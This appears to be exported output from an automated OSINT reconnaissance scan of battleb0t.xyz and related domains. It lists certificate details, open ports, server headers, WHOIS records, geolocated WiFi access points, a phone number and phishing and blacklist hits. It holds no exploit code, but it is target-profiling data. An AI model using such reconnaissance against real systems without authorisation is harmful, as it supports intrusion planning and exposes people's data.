X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
98:BA:3D:0D:C8:59:5C:05:86:25:C6:DE:57:7A:62:02:A8:E1:D5:36
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 23 21:32:58.351 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:F9:02:68:04:DD:BD:03:2E:AE:18:AA:
AF:0D:3B:37:54:0B:65:42:08:02:43:59:39:EA:4E:E4:
74:9E:81:C9:7F:02:21:00:A3:06:40:AE:98:69:3E:CB:
1F:F6:11:FA:78:DC:13:53:6B:E1:77:75:9F:C2:16:A0:
DB:C3:04:86:97:E4:3C:C0
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Mar 23 21:32:58.367 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:7A:A2:EB:6D:CE:11:7A:04:E7:47:C4:C2:
44:9A:BB:45:2B:47:3C:26:06:C5:A4:73:04:05:59:C0:
EA:D7:C9:86:02:21:00:96:12:0C:16:C7:15:09:8E:8E:
23:55:5D:FF:D3:4D:29:B3:21:12:6C:94:18:E0:30:4E:
4A:D0:D6:81:62:80:25
Signature Algorithm: sha256WithRSAEncryption
54:a4:7f:41:90:b7:5a:58:4b:b5:6b:68:ea:db:5a:92:b3:b2:
5b:7b:19:af:8a:ab:f1:af:c0:c8:97:4c:34:bf:3f:32:11:7b:
ef:8b:7e:76:7a:87:16:2c:1f:d0:41:d1:c1:02:b1:37:57:af:
4c:2b:b8:7b:75:a1:66:6d:db:db:ab:82:a1:fd:0c:b1:09:1f:
f6:3b:6f:e4:40:6a:6c:5b:ef:1d:46:ef:b3:b7:e2:09:40:10:
a0:d1:48:3e:99:ab:85:a3:c4:4c:9c:38:4c:86:5d:05:6c:1b:
02:ea:8a:b9:cd:33:f5:2b:4f:92:81:81:2f:e1:d6:b3:a5:e1:
b8:f6:e8:c6:e4:af:f3:a4:96:e9:02:f8:de:c5:31:3b:03:6b:
a3:c1:43:ea:01:84:7b:d7:65:c2:7b:26:5b:45:8b:c9:00:4a:
bf:64:80:db:bc:e4:35:f5:31:8b:1a:49:c1:a9:b6:8d:8f:59:
62:4e:f9:b9:59:d2:7d:9b:3a:75:2f:82:0e:77:1f:fa:cc:3b:
4e:90:c2:ba:e9:1d:4c:b0:a0:53:8e:4b:72:4b:e7:12:e4:36:
5a:97:fc:6e:97:fc:a5:f5:76:de:6f:cd:f5:6d:3f:07:f6:75:
e6:97:55:45:a3:14:55:0c:ff:89:33:2c:76:5f:49:b1:2d:bb:
1e:69:4c:4d
|
| 2023-05-12 03:12:55 | Physical Location | No | numverify | 0 | 0 | 3 | 0 | None | Phoenix, US | +14806242598 |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Open Graph | nwapi2.battleb0t.xyz |
| 2023-05-12 02:50:19 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | United States | 34.148.97.127 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 6 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:21 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:21 GMT", "cf-ray": "7c5f60688e300ce1-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:55:18 | Open TCP Port Banner | No | Censys | 0 | 1 | 3 | 0 | None | SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1 | 46.101.229.70 |
| 2023-05-12 02:45:31 | Raw Data from RIRs | No | PhishStats | 0 | 0 | 2 | 0 | None | [{u'page_text': u' ', u'domain': None, u'virus_total': None, u'n_times_seen_ip': None, u'abuse_contact': None, u'ip': u'185.199.111.153', u'google_safebrowsing': None, u'threat_crowd': None, u'n_times_seen_domain': None, u'alexa_rank_host': None, u'id': 2293641, u'city': u'', u'abuse_ch_malware': None, u'countrycode': u'NL', u'title': u'Payment request', u'ssl_subject': None, u'technology': None, u'date_update': u'2020-12-08T01:50:24.000Z', u'zipcode': u'', u'alexa_rank_domain': None, u'score': None, u'vulns': None, u'latitude': u'52', u'regionname': u'', u'hash': u'9ee11d071cac91169efe1c0a71aadc337743e7b1dbe899b003476c340ed7ecf3', u'threat_crowd_subdomain_count': None, u'screenshot': None, u'n_times_seen_host': None, u'ssl_issuer': None, u'domain_registered_n_days_ago': None, u'regioncode': u'', u'host': u'binance-btc.github.io', u'date': u'2018-06-28T12:07:20.000Z', u'asn': u'AS54113', u'tags': None, u'bgp': u'185.199.108.0/22', u'url': u'https://binance-btc.github.io/', u'isp': u'FASTLY - Fastly, US', u'longitude': u'4.89950000', u'ports': None, u'countryname': u'Netherlands', u'threat_crowd_votes': None, u'http_server': None, u'tld': u'io', u'os': None, u'http_code': None}] | 185.199.111.153 |
| 2023-05-12 02:53:42 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 185.199.109.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:02:2D:03:10:83) | 37.780462,-122.390564 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 3 | 0 | None | cloudflare | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | bsbmuh (Net ID: 00:08:5C:F1:78:3B) | 40.2024, 29.0398 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2086 | 104.21.71.14 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 6 | 0 | None | Nics Telekomunikasyon Ltd. | Domain Name: KEYUBU.COM
Registry Domain ID: 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registry Expiry Date: 2023-07-31T21:39:32Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.COM
Registry Domain ID : 2292564494_DOMAIN_COM-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:33Z
Creation Date: 2018-07-31T21:39:32Z
Registrar Registration Expiration Date: 2023-07-31T21:39:32Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.COM
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:12:03Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WaveLAN Network (Net ID: 00:02:2D:1B:7E:B1) | 34.0544, -118.244 |
| 2023-05-12 02:46:17 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | GitHub, Inc. is an Internet hosting service for software development and version control using Git. It provides the distributed version control of Git plus access control, bug tracking, software feature requests, task management, continuous integration, and wikis for every project. Headquartered in California, it has been a subsidiary of Microsoft since 2018. It is commonly used to host open source software development projects. As of January 2023, GitHub reported having over 100 million developers and more than 372 million repositories, including at least 28 million public repositories. It is the largest source code host as of November 2021. | cdn-185-199-111-153.github.com |
| 2023-05-12 03:09:49 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 79.170.74.34.bc.googleusercontent.com | 34.74.170.79 |
| 2023-05-12 02:44:17 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.111.153 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000000014286.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:01:24:F2:E2:35) | 37.780462,-122.390564 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2052 | 172.67.135.9 |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@namecheap.com | Domain Name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:15:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T13:15:09.13Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:45:25 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.111.153 |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 6 | 0 | None | abuse@namecheap.com | Domain Name: ECASH-PAY.COM
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15Z
Creation Date: 2021-04-26T06:58:38Z
Registry Expiry Date: 2024-04-26T06:58:38Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: DNS1.REGISTRAR-SERVERS.COM
Name Server: DNS2.REGISTRAR-SERVERS.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: ecash-pay.com
Registry Domain ID: 2607738264_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2023-03-27T06:28:15.08Z
Creation Date: 2021-04-26T06:58:38.00Z
Registrar Registration Expiration Date: 2024-04-26T06:58:38.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: b7a6addeb33844c5b2bc9f82a64406e6.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T10:12:16.55Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:03:42 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | nwapi.battleb0t.xyz | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://nwapi.battleb0t.xyz', u'http_status': 301, u'plugins': {u'Country': {u'string': [u'RESERVED'], u'module': [u'ZZ']}, u'HTTPServer': {u'string': [u'cloudflare']}, u'RedirectLocation': {u'string': [u'https://nwapi.battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'cf-cache-status,report-to,nel,cf-ray,alt-svc']}, u'IP': {u'string': [u'172.67.168.252']}}}, {}] |
| 2023-05-12 03:00:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.31): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.195): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:41:52 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.0/24 | 45.131.109.53 |
| 2023-05-12 02:44:59 | Similar Domain | Yes | Similar Domain Finder | 1 | 0 | 1 | 0 | None | tayhu.xyz | ayhu.xyz |
| 2023-05-12 03:13:07 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00feng00.github.io]
https://www.openphish.com/feed.txt | 00feng00.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GP (Net ID: 00:01:24:F1:7F:54) | 37.780462,-122.390564 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.251): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:16 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://oldfluid.battleb0t.xyz/./script.js |
